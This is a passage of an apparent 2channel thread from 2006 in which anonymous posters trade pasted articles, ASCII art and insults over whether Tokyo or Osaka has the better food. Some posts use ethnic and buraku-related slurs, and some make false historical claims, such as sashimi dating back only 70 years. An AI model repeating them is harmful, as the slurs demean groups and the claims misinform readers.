が、そのルーツと言われています。やがて大正以降、まるいくぼみのある鉄板で一口サイズ
に焼き上げられた「ちょぼ焼き」や、その後には「ラジオ焼き」と呼ばれるおやつが大阪で生ま
れました。「ラジオ」の名が冠されたのは、ラジオが当時の最先端だったこととか、ラジオのツ
マミに似ていたからなどという説があります。いずれにせよ、この時点ではまだ中にタコは入
っておらず、具はこんにゃくやスジ肉だったそう。タコが入れられるようになったのは、昭和10
年頃、明石焼きにヒントを得てからのことと言います。
タコに天かす、紅ショウガ。大阪風のだしをしっかり効かせた生地を手際よく、表面カリカリ、
中身はとろ〜り焼き上げる。甘いソースをべったりぬって、あとは青のり、鰹節。食い倒れの
街、大阪だからこそ生まれた庶民の味には、小さな感動さえわきおこってきます。大阪では
半数以上の家庭にたこ焼き器があるそうですが、最近はどこでもたこ焼き用の鉄板が手に
入りやすくなったようなので、ぜひご家庭で試してみてはいかがでしょうか。なかなか奥の深
いたこ焼きの世界に、きっとあなたもハマるかも?

>このたこ焼きが大阪に登場したのは意外に新しく、明治時代に東京で生まれた「もんじゃ焼き」の、水分>を少なくした「どんどん焼き」が関西に入ってきたのが、そのルーツと言われています。



148 :もぐもぐ名無しさん:2006/12/25(月) 02:37:35
東京の薄っぺらいトーストを指摘されたのが効いたんだねw

149 :もぐもぐ名無しさん:2006/12/25(月) 02:38:03
明石焼きはたこ焼きのルーツではない

たこ焼きのようで、たこ焼きにあらず。「たこ焼き」と「明石焼き」が大きく異なるのは、地元で
は「玉子焼き」と言われていることからもわかるとおり、ゆるめの生地には卵がふんだんに入
ること。それと、ソースではなく、カツオや昆布のだし汁につけて食べること。この違いだけで
も、明石焼きには、たこ焼きとはまるで異なる味わいがあるものです。
丸く焼いても皿にとると平べったくなってしまうほど、明石焼きはふわふわとやわらかく、箸で
つまむのも難しいくらいですが、その秘密は卵だけでなく、小麦粉のほかに混ぜられる「じん
粉(こ)」にあります。じん粉は、小麦粉からグルテンを分離させた「でんぷん」のことで、ふつ
うは「浮き粉」と呼ばれます。ふわふわの明石焼きには、このじん粉が欠かせません。また、
たこ焼きは通常、鉄板で焼かれるのに対し、明石焼きは薄い銅製の専用型で焼くお店がほと
んどです。
明石焼きの起源についてですが、今からおよそ160年前の天保年間、明石に「明石珠(玉)」
という工芸品がありました。これは卵白を使用した珊瑚の代用品で、かんざしなどに使われ
ました。卵の白身を使うので、黄身のほうが余ってしまいます。そこで卵黄と、明石でよく採れ
たタコを使って「玉子焼き」が生まれたという説があります。明石焼きが大阪のたこ焼きの元
になったというのは、「たこ焼き」の項で触れたとおりです。



150 :もぐもぐ名無しさん:2006/12/25(月) 02:38:37
>味の濃い物多くて飽きないんですか?

味の濃い料理は、武士と職人の多かった関東の料理の特徴です
関西は薄味が主流でした



151 :もぐもぐ名無しさん:2006/12/25(月) 02:39:25
>>148
反論できなくなると、火病おこすのは、隠れ○○の東京側ってことが証明されたね
やっぱり、モグリってこわいわー

152 :もぐもぐ名無しさん:2006/12/25(月) 02:39:48
そばめしの話

細かく刻んだ焼きそば。よくよく見るとその中には、なんとごはんが混ざっているではありませ
んか。この「そばめし」なる食べ物に遭遇し、初めはびっくりした方も多いのではないでしょう
か。おそるおそる口に運んでみると、意外なマッチングに、またびっくり!
そばめしの歴史は意外と古く、その発祥は昭和30年代頃の神戸市長田区と言われます。“
靴の街”として知られる長田区には工場が多く、そこで働く工員がお好み焼き屋で焼きそばを
注文、持参していた弁当のごはんといっしょに炒めてもらったのが始まりと言われています。
これが裏メニューとしてじわじわと浸透していったようです。神戸を中心にいくつかのお店でメ
ニューとして定着してからも全国的に知られることはありませんでした。しかし1995年、阪神
淡路大震災の復興のニュースで、そばめしが紹介されたのをきっかけに、徐々に知られるよ
うになっていきます。2000年頃、冷凍食品が登場してからは、完全に全国区になったと言っ
ていいでしょう。
肉や野菜、切ったそばを炒め、そこにごはんを加え、ソース味で仕上げます。どろっとしたピ
リ辛のソースを使うのが神戸流。半熟に炒めた卵をのっける「オムそばめし」も人気です。

 大阪名物が一つも無い事がおわかりになった事でしょう。

たこ焼きのルーツがもんじゃ焼きだって事が証明されましたね。
http://ja.wikipedia.org/wiki/%E3%82%82%E3%82%93%E3%81%98%E3%82%83%E7%84%BC%E3%81%8D
1819年刊『北斎漫画』に、「文字焼き屋」の挿絵があり、この時代既に江戸にもんじゃ焼きに類するものがあったことが分かっている。

歴史的にも非常に古いもんじゃ焼き



153 :もぐもぐ名無しさん:2006/12/25(月) 02:40:19
焼肉、フグ料理に続いてトーストでも大阪の勝利♪



154 :もぐもぐ名無しさん:2006/12/25(月) 02:41:05
東京君、兵庫の明石をもちだしてたこ焼批判
関西自体は認めてるのね


155 :もぐもぐ名無しさん:2006/12/25(月) 02:41:11
関西のうどんは90gか95gの小麦粉に対して5gから10g入れるから
つゆが薄くても結果的に関東と全く同じになる。
http://allabout.co.jp/gourmet/udon/closeup/CU20020902matu/
なぜかつゆが黒い大阪きつねうどん発祥の店
http://www.iokikai.or.jp/r.teutiudon.htm
関西のうどんは塩辛い
2麺の作り方
 @食塩水濃度と量(これが大切。必ず計量して下さい。)
季節 中力粉g 食塩濃度% 食塩水g
冬  100      6     46〜50
春秋 100      8     44〜48
夏   100     10    42〜46

塩辛い関西のうどんのポイント

156 :もぐもぐ名無しさん:2006/12/25(月) 02:41:35
千葉(笑)

157 :もぐもぐ名無しさん:2006/12/25(月) 02:42:19
うわーーーー
店によって味付けも塩・醤油の分量ちがうのに、
超詳細なg数だして比較してる

こわいよーーーー

158 :もぐもぐ名無しさん:2006/12/25(月) 02:44:08
松下 現在とさほど変らないと捉えていただいて結構です。タイはタイ、イワシはイワシのままですから(笑)。
調理法も、フライのような洋食はもちろんありませんでしたが、それ以外は、煮るか焼くか、やはり今とあまり
変らないのです。

しかし面白いのが、現在と江戸時代では、魚の位付けが随分違うということです。今、マグロやフグといえば、
上中下の位を付けるとすると間違いなく上の魚ですが、江戸時代はイワシと同じ下の位とされていたのです。
ましてやトロなんて、脂分が嫌われたようで全然人気がなかったのです。


ふぐはいわしと同じ安い魚で食べられていた歴史も浅い



159 :もぐもぐ名無しさん:2006/12/25(月) 02:45:07
そもそも江戸の歴史自体浅い

ついでに、君の家の東京土着年数も浅い





合掌

160 :もぐもぐ名無しさん:2006/12/25(月) 02:45:24
@関西には手打ちうどんがほとんどなく、あるとすれば讃岐になる
A大阪うどんで有名な店をさがすと讃岐に行き着く
Bつゆ以外の特徴が無い
Cつゆも何故か江戸後期に使われ始めたかつお出汁がベースで江戸の文化に強い影響を受けている(きつねうどん)
Dかつお節は江戸時代前期までは全国的に食用で、特に関西地域には出汁を取る習慣が無い。
E関西のかつお節はあら節が支流で、花鰹などの習慣が無かった
F江戸時代には土佐からかつお節を仕入れていたのが関東地方に限られていた


161 :もぐもぐ名無しさん:2006/12/25(月) 02:46:52
2.鰹節の誕生
室町時代に入り、干しカツオに「焙乾」という技術が導入され、「鰹節」ができました。江戸時代
に入る前から焙乾小屋は、五島・平戸・紀伊・志摩・土佐各国のカツオ浦に建てられました。
当初の焙乾設備は台所兼用のもので、囲炉裏の上にしつらえた平籠に卸したカツオを入れ
ておくと、煮炊きをする熱と煙により自然と焙乾されるものでした。 江戸時代初頭には、北九
州方面で作られた鰹節は、ポルトガル船・イギリス船などにより、平戸から琉球を経て、明国
・シャム国などに輸出されました。

その後、鰹節が広く世間で名声を得たのは、紀州で焙乾小屋が改良され、鰹節が進歩を始
めてからです。堺港の大商人や、京の都の上流家庭で、煮物・汁物料理が盛んになり、従来
の調味料だけでは物足りなくなり、旨味を付加するために鰹節がだしとして用いられるように
なりました。

江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました。ちょうど
この時期にたくさんの料理書が発刊され、その中で調味料として鰹節だしについて触れぬも
のはないほど必需品として取り上げられています。鰹節の力により、日本料理が形成された
といっても過言ではありません。

紀州のかつお節のルーツは佃煮

かつお出汁ができたのは江戸時代である
それまでは、かつお節はお湯でもどしてそのまま食べる魚料理

さば節もほぼ同じルーツ。

特にかつお出汁を取り上げた理由は、大阪うどん「きつねうどん発祥の地」のつゆがかつお
出汁と昆布と言う単純な事から書くことにした。
現代のかつお節が完成したのは明治30年
しかし、花かつおなどやあら節ができあがっただろうと言われているのが江戸時代前半なの
で非常に古い文化と思っているほうが間違え。



162 :もぐもぐ名無しさん:2006/12/25(月) 02:47:22
うどんは讃岐!大阪じゃない!とかいうのに、
鰹節は土佐じゃなくて江戸なんでっか?
おかしくないですか?^^;;;;;;;;;

163 :もぐもぐ名無しさん:2006/12/25(月) 02:47:24
カントン人は不利になるとすぐコピペの嵐。
関西側が勝ったと確信する瞬間でもあるw



164 :もぐもぐ名無しさん:2006/12/25(月) 02:47:28
きつねうどんの話

「きつねうどん」は明治時代、大阪に開業したうどん屋さんが「いなり寿司」を参考にして考案
したと言われています。しょう油とみりんで煮含めて、ふっくらやわらかく仕上げた大きな油揚
げがうどんにのっかります。讃岐うどんなどに比べるとやわらかめの麺、甘辛い油揚げ、そし
て関西ならではのつゆが絶妙な取り合わせ。特に、鰹節や鯖節、昆布などのだしが利いたつ
ゆは、最後まで飲み干したくなる味です。うまい、安い、早い──その合理的なところがいか
にも大阪らしく、大阪を訪れたらとりあえず一杯、という方も少なくないでしょう。
ところで大阪で「きつね」と言えば、それは「きつねうどん」のこと。関東で言う「きつねそば」(
油揚げ入りのそば)は、大阪では「たぬき」と呼ぶことが多いようです。揚げ玉(天かす)が入
る関東の「たぬきうどん」は、大阪では「ハイカラうどん」と言うことがありますが、そもそも天
かすは無料サービスのお店が多いので、「すうどん(かけうどん)」ということで事足ります。
一方、京都で「たぬき」と言うと、刻んだ油揚げ入りのあんかけうどんを指すことが多く、刻ん
だ油揚げが入ったうどんは、大阪では「きざみうどん」‥‥なかなかややこしい話です。

「きつねうどん」は明治時代、大阪に開業したうどん屋さんが「いなり寿司」を参考にして考案
したと言われています。

これが伝統的な食べ物なんでしょうか???たかだか明治時代に作られただけなのに



165 :もぐもぐ名無しさん:2006/12/25(月) 02:48:04
>江戸時代
に入る前から焙乾小屋は、五島・平戸・紀伊・志摩・土佐各国のカツオ浦に建てられました

関東じゃないんですね




終了

166 :もぐもぐ名無しさん:2006/12/25(月) 02:48:25
>>150
武士が居た時代の話では無く、現代の食文化としての意見をお聞きしたいのですが。

>>156
千葉で何がいけないのでしょうか?
確かに治安も良くないし、田舎かも知れませんが場所にもよります。


あとコピペうざいんで貼らないで頂きたい。

167 :もぐもぐ名無しさん:2006/12/25(月) 02:48:32
大阪人:ワシらは地元の料理を大切にしてる
東京人:そうですか、それなら吉兆の事も良くご存知でしょうね
大阪人:素材の味がして薄口や
東京人:それじゃ意味がわかりません
大阪人:大阪は焼肉がうまいで
東京人:焼肉は韓国料理ですよ。地元の食べ物じゃないですよね
大阪人:頭狂人はフランス料理を自慢するやないか
東京人:フランス料理を真っ向から否定し続けて韓国料理は否定しないんですか?
大阪人:、、、、、、、、、
大阪人:カッペ、カッペ
東京人:まともな会話になりません


168 :もぐもぐ名無しさん:2006/12/25(月) 02:48:51
>たかだか明治時代に作られただけなのに
江戸前寿司も天麩羅も江戸半ばですよ
浅いんですよ



合掌

169 :もぐもぐ名無しさん:2006/12/25(月) 02:49:57
しかし何だな〜
東京の連中って、真っ黒な出し汁の饂飩とか納豆
もんじゃ、くさや等、彩りも悪けりゃ匂いが臭いのが
好物なんやね。

170 :もぐもぐ名無しさん:2006/12/25(月) 02:49:59
京都料理などが、非常に古くから日本の基盤にあったような妄想を書き込む関西人達。
 実際にはかつお節すら無く。それ以外の料理があったと言う事実も無い。

 江戸時代前半に現代のかつお節に類似した商品ができあがってから料理の献立の文献が
非常に多く書かれていることから、江戸時代より前の食文化はほぼ無いに等しい。(現代の
料理店で食べられている食事の事)

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました。ちょうど
>この時期にたくさんの料理書が発刊され、その中で調味料として鰹節だしについて触れぬも
>のはないほど必需品として取り上げられています。

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました

熊野節があら節や花かつおになったので、それより昔には懐石料理の原型は無いに等しい

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました。ちょうど
>この時期にたくさんの料理書が発刊され、その中で調味料として鰹節だしについて触れぬも
>のはないほど必需品として取り上げられています。

 滑稽な事に、大阪人の誇りである。「食文化」が捏造だとわかった。
 昆布出汁だけで作ると言い張る大阪人。
 精進料理でもせいぜい作って伝統の食文化とでも言ってみなさい。(笑)
 精進料理はほぼバチモン料理で、オリジナルの精進料理が非常に少ない。

 どれだけかつお節の世話になっているのか考えた事はあるのだろうか?



171 :もぐもぐ名無しさん:2006/12/25(月) 02:51:00
5.本枯節
江戸時代に由緒ある製品として知られたのは、熊野節・土佐節・薩摩節です。明治時代に入
ると伊豆節が目覚しい発展を遂げ、土佐節・薩摩節・伊豆節が三大名産品と称されるように
なりました。

明治30年頃、土佐節と伊豆節の長所を取り入れ、徹底した焙乾・3〜6回のカビ付けを行った
「本枯節」である焼津節が登場し、以後鰹節業界の本流となり、現在に至っています。

つまり現代のかつお節ができたのは、江戸時代初期〜後期にかけてという事になり、それ以
前のかつお節は、干物(完全に干からびた)の煮出し汁でカビ付けなどされていない物
関西地域では、多少生に近いかつお節を「花かつお」にする習慣が江戸時代後期にされたと
言われている。
それまでは、全国的にかつお節は佃煮のような食品である。


172 :もぐもぐ名無しさん:2006/12/25(月) 02:51:04
>>167
お前、今までに口にした事ない物を羅列して
食べた気になってるんか?

173 :もぐもぐ名無しさん:2006/12/25(月) 02:51:14
>>166
自分で貼っててよくそんなことが言えるな。

174 :もぐもぐ名無しさん:2006/12/25(月) 02:51:44
>>166
薄味のたこ焼もありますよ
現代の食文化・・・
マックやモス行ったり、インスタントラーメン食べない人に聞いてみてください

175 :もぐもぐ名無しさん:2006/12/25(月) 02:52:13
http://hb2.seikyou.ne.jp/home/my-morita/ni/how_to/ni_chronology2.htm
今川焼き、たい焼きも東京が発祥

http://www.meikatanbou.com/chi_/chi_w/w_s071.htm
///駄菓子/// 

駄菓子とは菓子の中の駄物という意味では、安価で質も高級品ではない干菓子をさしていま
すが、もともとは江戸時代の「雑菓子」からきています。精製された白砂糖が貴重品であった
ために、幕府は庶民の菓子に白砂糖の使用を禁止し、庶民が口にする菓子の甘味料には黒
砂糖が用いられました。これを雑菓子と呼び、大名や武士だけが食する上菓子と区別したの
です。その後、白砂糖の生産力が高まり、明治以降は上菓子と雑菓子の区別はなくなりまし
たが、雑菓子のルーツを受け継ぐ安い菓子の総称として「駄菓子」という名が使われるように
なりました。大正末期から昭和初期にかけては町の駄菓子屋に加えてべっこう飴やゲンコツ
飴、蒸し羊羹などを売り歩く行商人もいました。戦後になって砂糖の配給制が無くなる頃には
駄菓子屋も復興し、チューインガム、チョコレート、ラムネ、コーラといった西洋の菓子も店頭
に並ぶようになりました。
子供用の駄菓子とは違う「郷土駄菓子」という菓子もあります。有名な地域は仙台・会津・飛
騨などが挙げられます。その土地ならではの作物を主原料にシンプルな調味料だけで作ら
れます。有平糖、かりんとう、せんべい、ようかんなど同じ菓子でも地域によって味は変わり
、地方名菓として和菓子屋などで販売されています。


和菓子が江戸で文化が栄えなかったわけは、庶民の白砂糖の使用を幕府が禁止していた
事があげられる。
大名や武士だけが食する上菓子と区別したのです。
東京にある和菓子が駄物(だもの)が多い理由は幕府による規制が強すぎて、和菓子屋が
衰退しまった為です。


176 :もぐもぐ名無しさん:2006/12/25(月) 02:53:15
>>172
こいつは脳内では東京の代表で、ファイルから必死でコピペさがして貼ってる
きもくね?

177 :もぐもぐ名無しさん:2006/12/25(月) 02:53:49
http://www.arakawa-unet.jp/issue/0604/index.html
もんじゃ焼きは荒川が発祥

大正育ちの叔母の記憶によると、当時から三河島の駄菓子屋ではもんじゃ焼きがあったそう
です。もんじゃ焼きは「駄物(だもの)」といって、駄菓子屋で出す子ども向けのお菓子のひと
つでした。紙が高級品だった時代なので鉄板にメリケン粉を薄く延ばし、子どもたちに字を教
えていたと聞きます。「文字焼き」が、もんじゃ焼きの語源というのも、あながち嘘ではないの
かもしれません。店の隅に練炭やタドンを置き、その上に鉄板を敷いてもんじゃを商っていた
のでしょう。
「あんこ焼き」は和菓子そのもの、出来立てのアツアツが美味しい。
 子どもたちは、もんじゃ焼きの中にあんこ玉を挟んだりソースせんべいに絡ませたりと、駄
菓子屋にある他のお菓子と組み合わせては、おいしく食べる工夫をしたようです。それが、も
んじゃ焼きのバラエティの多さに発展していったのでしょう。
 駄菓子屋(もんじゃが食べられる所)の多さを考えると、戦後は日暮里に駄菓子問屋街もあ
りましたから、もんじゃ焼きの始まりはやはり荒川区か台東区でしょうね。

こんな事が「どら焼き」などのルーツであって、きらびやかで雅な世界とはかけ離れている。
どこでも生まれる文化ではなく、下町の人々の甘いものに対する思いが今の形のたい焼き、
今川焼き、どら焼きといった文化を形成してきたのである。




178 :もぐもぐ名無しさん:2006/12/25(月) 02:54:03
つか、全部論破されたコピペばっかり貼ってるよ・・・
さっさとピザ食って寝ろよ

179 :もぐもぐ名無しさん:2006/12/25(月) 02:55:08
 江戸時代より前まではかつお節や昆布は佃煮のように食べる食品だった。
 つまり関西地方、特に京都や大阪でかつお節や昆布を出汁にして料理を作っていたと言う歴史的証拠が
全く無い。

 生の魚を刺身で食べたり寿司で食べたりすることも築地市場に冷凍倉庫ができあがった70年前あたりか
らの事で、実際に刺身で食べられるほどの鮮度の保てる冷蔵庫ができたのが40年程度前のこと。

 砂糖は江戸幕府の支配していた食品で、白砂糖は特に武士や一部の僧侶くらいしか食べる事ができな
かった。庶民は非常に高額な黒砂糖しか使えなかったので、砂糖を使う食品文化は、すべて武士や僧侶
以上の地位についていた人々の料理だったと言える。

 江戸幕府が衰退して2回の世界大戦を経験し、裕福な生活を送れるようになった現代では、以上の食材が
容易に手に入る事から、昔の貴族社会や武家社会が非常に贅沢な食べ物を毎日食べていたかのごとく語
られているが、庶民の食文化の歴史は実際には、ここ30年程度の歴史の話であり、それより昔の食生活が
ひどいものだった事は言うまでも無い。

 当然、お金回りの良い土地の方が豊かな生活が送れていた。だから、地方で東京ほどすぐれた食生活が
おくれていた可能性は極めて低い。
 戦時中に疎開を強いられたときに、田舎者が食料を高額で売りつけたと言う話が良く聞かれる。
 田舎者には特有の差別意識が有り、大阪の同和地区に限った話ではない。


180 :Fuck You Asshole:2006/12/25(月) 02:56:22
        __                   , -ー―- 、                rr‐-、
       l´ li                 /_,、,、,、,、,、,、,,\             |l、_i
.       lー‐' !           / r'´       `ヾヽ             i   l
       l   |             | i′         ゙l |            l   |
.      |   |            | ! ,,,,,___   __,,,,、、!.|            |  │ ___ .__
      l    L_.           _リ "rヮュ`  ´zヮュ ,iレ、        _/ ̄ヽ   !r´   i´ 〉
    /⌒'|  / ̄ヽi ̄ヽ       〈 ,i    , ' i  ヽ    l |      /  ',   |  ,|Y    | /
  r‐'i   |  |    |   |.       ヘ l     、 r     | /     |    |   !   `´   l |
  | !   '   !    !   l、      `i    ___    ,'´        !    '            | !
  ! ,!               |      ヽ   ´   `   /!       |                 ' |
  | ヽ             |         |ヽ      / .|       |               /
.  \                 |        | . `ー--‐ ´   .!        !              /
.    \          /       _/           ヽ、       ヽ           /
       \           |--‐┬=''´              `Tー‐┬ |         |

181 :もぐもぐ名無しさん:2006/12/25(月) 02:56:27
>>174
そうなんですか。
こちらで売られているたこ焼きは、全体的にくどいのでそちらでも一般的なんだと思ってました。
勘違いしてごめんなさい。
>>173
私は貼っていませんよ。
コピペ等貼っても無意味ですし、第一まともにお話を聞く事すら出来なくなりますから。

182 :もぐもぐ名無しさん:2006/12/25(月) 02:56:28
千葉県人だから、まっとうな東京大阪対決は無理なんだろう。
コピペでごまかしてる。

183 :もぐもぐ名無しさん:2006/12/25(月) 02:56:47
>当然、お金回りの良い土地の方が豊かな生活が送れていた。だから、地方で東京ほどすぐ れた食生活がおくれていた可能性は極めて低い

土地やお金の無い人々が東京に流れて都市スラム形成して生活していたんですよ


184 :もぐもぐ名無しさん:2006/12/25(月) 02:57:49
不味い水で出汁を取る大阪

琵琶湖の汚染はなにが原因か

 琵琶湖をのぞむ比良山系は、関西の登山では一番人気の武奈ガ岳(1214m)などが連らなる。この山地
が降った雨を涵養し琵琶湖へ流す。森は水を浄化し、土砂の流出を防ぎ二酸化炭素を吸収する。京都精華
大学の山田国広氏は『水と暮らしの環境文化』(昭和堂出版)の中で、「下流の都市住民は、上流の森林に
降った水を飲んでいることをほとんど意識していない。上流の森林が健全に育成されているからこそ、下流
は安心して水が飲める」と書いている。本書中では同氏は下流の住民は森林の機能を評価して、例えば水
源税や森林税や環境税というかたちで恩恵の還元をなすことを提唱している。

 水質検査の結果琵琶湖の水がかなり汚染されていることがわかった時、私はいささか落胆した。水道の蛇
口をひねれば水が出る、レバーを押せば尿が視界から消える。日常のあたりまえとなった動作に、「水の流
れ」を考えることもなくなっていたことを恥ずかしいと思った。

 農家に生まれ子供の頃から湧き水で育った。飲み水の大切さを生活の中で教えられていた。川を誰もが大
切に守っていたのである、そうした思いを新たにした水質検査であった。

http://www.bund.org/culture/20060515-1.htm


東京と大阪の水の硬度を示した場合。ほぼ同じ硬度になっている。
世界的な水準で考えると日本の水はほぼ軟水と言う事が図からわかります。
大阪人は東京の水が硬水で出汁を取るのに向かないと言い張ってますが、実際には同じです。

http://www.con-pro.net/readings/water/doc0017.html


185 :もぐもぐ名無しさん:2006/12/25(月) 02:59:49
>>182
失礼致しますが、東京、大阪の食文化等詳しい事はわかりません。
だからと言って場を荒らすのは、幼稚でしか有りません。
確かにレスするのは遅いですが、そうとしか取れないのならば一人で勝手にいちゃもん付けていてください。

186 :もぐもぐ名無しさん:2006/12/25(月) 03:00:30
i::::::::/'" ̄ ̄ヾi
           |:::::::| ,,,,,_  ,,,,,,|
           |r-==( 。);( 。)
           ( ヽ  :::__)..:: }
        ,____/ヽ  ー== ;  ほほう それでそれで?
     r'"ヽ   t、   \___ !
    / 、、i    ヽ__,,/
    / ヽノ  j ,   j |ヽ
    |⌒`'、__ / /   /r  |
    {     ̄''ー-、,,_,ヘ^ |
    ゝ-,,,_____)--、j
    /  \__       /
    |      "'ー‐‐---''

187 :もぐもぐ名無しさん:2006/12/25(月) 03:01:47
おーい、食パンに関しての反論まだぁ?

188 :もぐもぐ名無しさん:2006/12/25(月) 03:02:33
そばめしの話

細かく刻んだ焼きそば。よくよく見るとその中には、なんとごはんが混ざっているではありませ
んか。この「そばめし」なる食べ物に遭遇し、初めはびっくりした方も多いのではないでしょう
か。おそるおそる口に運んでみると、意外なマッチングに、またびっくり!
そばめしの歴史は意外と古く、その発祥は昭和30年代頃の神戸市長田区と言われます。“
靴の街”として知られる長田区には工場が多く、そこで働く工員がお好み焼き屋で焼きそばを
注文、持参していた弁当のごはんといっしょに炒めてもらったのが始まりと言われています。
これが裏メニューとしてじわじわと浸透していったようです。神戸を中心にいくつかのお店でメ
ニューとして定着してからも全国的に知られることはありませんでした。しかし1995年、阪神
淡路大震災の復興のニュースで、そばめしが紹介されたのをきっかけに、徐々に知られるよ
うになっていきます。2000年頃、冷凍食品が登場してからは、完全に全国区になったと言っ
ていいでしょう。
肉や野菜、切ったそばを炒め、そこにごはんを加え、ソース味で仕上げます。どろっとしたピ
リ辛のソースを使うのが神戸流。半熟に炒めた卵をのっける「オムそばめし」も人気です。

 大阪名物が一つも無い事がおわかりになった事でしょう。

たこ焼きのルーツがもんじゃ焼きだって事が証明されましたね。
http://ja.wikipedia.org/wiki/%E3%82%82%E3%82%93%E3%81%98%E3%82%83%E7%84%BC%E3%81%8D
1819年刊『北斎漫画』に、「文字焼き屋」の挿絵があり、この時代既に江戸にもんじゃ焼きに類するものがあったことが分かっている。

歴史的にも非常に古いもんじゃ焼き


189 :もぐもぐ名無しさん:2006/12/25(月) 03:03:46
沖縄とかに比べれば、東京も大阪も似たような水だが
それでも東京は大阪の2倍近く硬水だよ。
ttp://www.live-science.com/honkan/theory/kousui.html

190 :もぐもぐ名無しさん:2006/12/25(月) 03:05:11
琵琶湖の汚染はなにが原因か

 琵琶湖をのぞむ比良山系は、関西の登山では一番人気の武奈ガ岳(1214m)などが連らなる。この山地
が降った雨を涵養し琵琶湖へ流す。森は水を浄化し、土砂の流出を防ぎ二酸化炭素を吸収する。京都精華
大学の山田国広氏は『水と暮らしの環境文化』(昭和堂出版)の中で、「下流の都市住民は、上流の森林に
降った水を飲んでいることをほとんど意識していない。上流の森林が健全に育成されているからこそ、下流
は安心して水が飲める」と書いている。本書中では同氏は下流の住民は森林の機能を評価して、例えば水
源税や森林税や環境税というかたちで恩恵の還元をなすことを提唱している。

 水質検査の結果琵琶湖の水がかなり汚染されていることがわかった時、私はいささか落胆した。水道の蛇
口をひねれば水が出る、レバーを押せば尿が視界から消える。日常のあたりまえとなった動作に、「水の流
れ」を考えることもなくなっていたことを恥ずかしいと思った。

 農家に生まれ子供の頃から湧き水で育った。飲み水の大切さを生活の中で教えられていた。川を誰もが大
切に守っていたのである、そうした思いを新たにした水質検査であった。

http://www.bund.org/culture/20060515-1.htm


東京と大阪の水の硬度を示した場合。ほぼ同じ硬度になっている。
世界的な水準で考えると日本の水はほぼ軟水と言う事が図からわかります。
大阪人は東京の水が硬水で出汁を取るのに向かないと言い張ってますが、実際には同じです。

http://www.con-pro.net/readings/water/doc0017.html



191 :もぐもぐ名無しさん:2006/12/25(月) 03:06:16
http://www.con-pro.net/readings/water/doc0017.html

文字も読めないのか大阪人さすがに本物の馬鹿だ

192 :もぐもぐ名無しさん:2006/12/25(月) 03:06:54
あんな薄っぺらい食パンじゃ、パンの味なんてしないだろうな。
外はサクサク、中はフンワリじゃないとな。

193 :もぐもぐ名無しさん:2006/12/25(月) 03:07:02
            __,,..、、- - - .、、...,,___
       ,,、‐''"~ ̄            ̄``''‐、、
     /                      \
    /                         ヽ
   /                           ヽ
   /  / ~~` '' ‐- 、、 ,,__   __ ,,..、、 -‐ '' "~~\  ヽ
   |  /    __           ̄       __   ヽ  |
  .|  {  ´   ‐- ....__    __... -‐   `   } .|
  .|  〉,,・^'' - .,,      ~  i ~    __,,.- ^`・、.〈  |
./ ̄|  /,/~ヽ、  `'' ‐--‐ ,.| 、‐-‐'' "~   _ノ~\,ヽ | ̄ヽ
| (` | / ヽ,,_____`‐-、_、..,,___ノ八ヽ___,,.._-‐_'"´___,, ノ ヽ .|'´) |
| }.| ./'   \二二・二../ ヽ  / ヽ、二・二二/  'ヽ | { |
.| //| .|          / |  |. \         | |ヽヽ|
.| .| | .|        /    |  |.    \       | | | .|
|ヽ.| |      /     .|  |.     ヽ      .| .|./ .|
 |  .| |     /      |  |        ヽ     |  | /   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ヽ .| |    /       .|  |       ヽ    |  | /  |  用件を
  .ヽ.| |    /     '二〈___〉二`       ヽ   |  |./  <
    | |          `-;-′         |  |     |  聞こうか…
     iヽ|.      ,,... -‐"`‐"`'‐- 、、     |/i       \_________
     |  ヽ     /...---‐‐‐‐‐----.ヽ    /  .|
     |   ヽ.    ,, -‐ ''"~ ~"'' ‐- 、    /   |
    .|    ヽ         !          ./   .|
    ,,|     ヽ.         |        ./     |、
    |\.     ヽ            /     /.|
   .|.  \.      ヽ、____   ___/    /   .|
   '     `            ̄ ̄       ´     '

194 :もぐもぐ名無しさん:2006/12/25(月) 03:08:14
http://www.kyoto-np.co.jp/kp/special/shiokaze/shiokaze_index.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kita01.html
近江商人が開拓した北海交易に雇われた北陸の船乗りが力をつけて独立、北前船交易が隆盛をきわめ、西回りで大阪まで昆布が持ち込まれるのは、江戸時代になってからだ。
この頃、白口浜の昆布が京、大阪へ届く。透明な出汁で京料理に欠かせない利尻昆布はさらに遅れる。

http://www.kyoto-np.co.jp/kp/special/shiokaze/kita02.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kita03.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kita04.html
かつお節
http://www.kyoto-np.co.jp/kp/special/shiokaze/kare01.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kare02.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kare03.html

京料理で重要なかつお節が出来上がったのは明治30年


195 :もぐもぐ名無しさん:2006/12/25(月) 03:08:30
東京の連中は、パンすら、まともなのを食べた事が
ないんや

196 :もぐもぐ名無しさん:2006/12/25(月) 03:08:53
>>187
先程は決め付けてしまいましたが、ここは地域の違いと言う事で終わりにしませんか?
はっきり言って、こちら側で5枚切りなど見た事は無いし、どういった理由があってそうなったのかも分かりません。
それに6枚切りもあくまで、自分なりの解釈で偶数の方がいいからなのかもと思っていますし。

197 :もぐもぐ名無しさん:2006/12/25(月) 03:11:17
大方、ドラマかなんかでタレントが薄っぺらい食パン食ってて
それがオシャレとか思って真似して食ってんだろうな。
関東の食文化なんてその程度のレベルw

198 :もぐもぐ名無しさん:2006/12/25(月) 03:11:59
>>195
厚さはメーカーにもよりますが、ネオソフト?でしたっけ…は、厚みも有るので一概に関西だけ厚いって訳でも無い様です。



199 :もぐもぐ名無しさん:2006/12/25(月) 03:12:16
ええと>>100です。食パンの回答ありがとうございました。

それにしてもわずかな時間に大量のコピペ。
この人の聖夜にも幸せが訪れますように。

200 :もぐもぐ名無しさん:2006/12/25(月) 03:13:42
http://www.ninben.co.jp/004katuo/10rekishi/index.html
4.土佐余市

江戸の後期に、紀州印南浦の住人で、土佐与市という鰹節職人が、安房(1781)・伊豆(1801
)の両国に改良土佐節を紹介しました。これを熱心に取り入れた伊豆では、土佐節の製法を
